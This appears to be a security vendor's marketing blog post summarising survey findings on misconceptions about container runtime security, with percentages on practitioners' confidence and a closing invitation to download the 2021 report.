While container environments grow in size and complexity, many misconceptions persist about securing cloud native applications. Our latest survey reveals a huge knowledge gap around runtime security, with 97% of cloud native security practitioners still unaware of crucial container security principles. Here are the insights we gained into the challenges that DevOps and security teams face daily.
Survey highlights
The default security of containers is overestimated
The term “container” is often misunderstood. The concept of isolation tends to give many practitioners a false sense of security, believing that this technology is inherently safe. The reality is that containers don’t have any security dimension by default. Our container runtime security survey found that only 3% of respondents understand that a container, in and of itself, is not a security boundary.
‘Shift left’ isn’t a silver bullet for cloud native security
While static analysis plays an important role in container security, even the most complete shift-left capability can’t prevent zero-day attacks and administrator errors. Container runtime security is critical in protecting against adversaries who evade static analysis or otherwise get around more popular, and better understood, shift-left controls.
Key cloud native security concepts are largely misunderstood
The overwhelming majority of respondents (85%) believe that traditional tools like intrusion prevention systems (IPS), endpoint detection and response (EDR), and firewalls could stop an attack in progress in a cloud native environment (an attack that occurs after an image has been deployed to an environment). In fact, traditional security tools weren’t built for cloud native traffic and have limited capabilities in dynamically orchestrated environments.
Practitioners are overconfident in their protection
The survey shows that teams need to better understand the fundamental components of runtime security, such as enforcing the immutability of containers. Only 32% of respondents were confident in their ability to stop runtime attacks, but even fewer take the necessary steps to truly achieve runtime protection:
- Only 14% were confident in enforcing image immutability in production
- Only 21% were confident in mitigating exploits in runtime
- Only 23% were confident in achieving secrets management in runtime
Without these essential runtime capabilities, it is impossible to adequately detect threats and respond to them in the cloud native environment.
Confidence in cloud native security capabilities
Organizations are ill-equipped to detect and remedy runtime attacks
When it comes to runtime protection, organizations still have significant gaps in their security coverage. Just 26% of respondents said their organization could stop an attack in progress, which signifies a general lack of runtime capabilities across the other 74% of respondents’ toolkits.
The urgency for runtime security controls
As the threat landscape rapidly evolves, strong runtime security is more essential than ever. We’ve seen many examples of adversaries using legitimate vanilla images that download malicious elements only at runtime. Simply shifting left with image scanning and malware detection at build isn’t enough to stop such sophisticated attacks that evade static analysis.
Only holistic cloud native security, applied across every stage of the application life cycle, can efficiently secure your cloud native environment while preserving business continuity. This approach embeds security early in the development cycle and seamlessly bakes it in all the way into production, protecting the build, infrastructure, and running workloads.
Want more insights to help understand the container runtime security challenges? Download our 2021 Cloud Native Security Survey.